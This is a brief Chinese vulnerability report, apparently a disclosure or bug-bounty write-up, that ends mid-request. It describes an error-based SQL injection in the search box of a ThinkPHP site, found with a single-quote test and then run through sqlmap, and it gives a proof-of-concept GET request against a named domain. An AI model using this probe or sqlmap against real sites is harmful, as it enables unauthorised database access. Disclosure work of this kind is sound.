通过寻找注入点，发现sql注入点在搜索处，进行单引号等特殊符号测试，发现thinkphp框架式报错sql注入的数据库错误，使用sqlmap进行一把梭##### 漏洞url位置：搜索框影响参数1'漏洞POCGET /index/news/search.html?keywords=1%27 HTTP/1.1 Host: zljsjt.com.cn Upgrade-Insecure-Requests: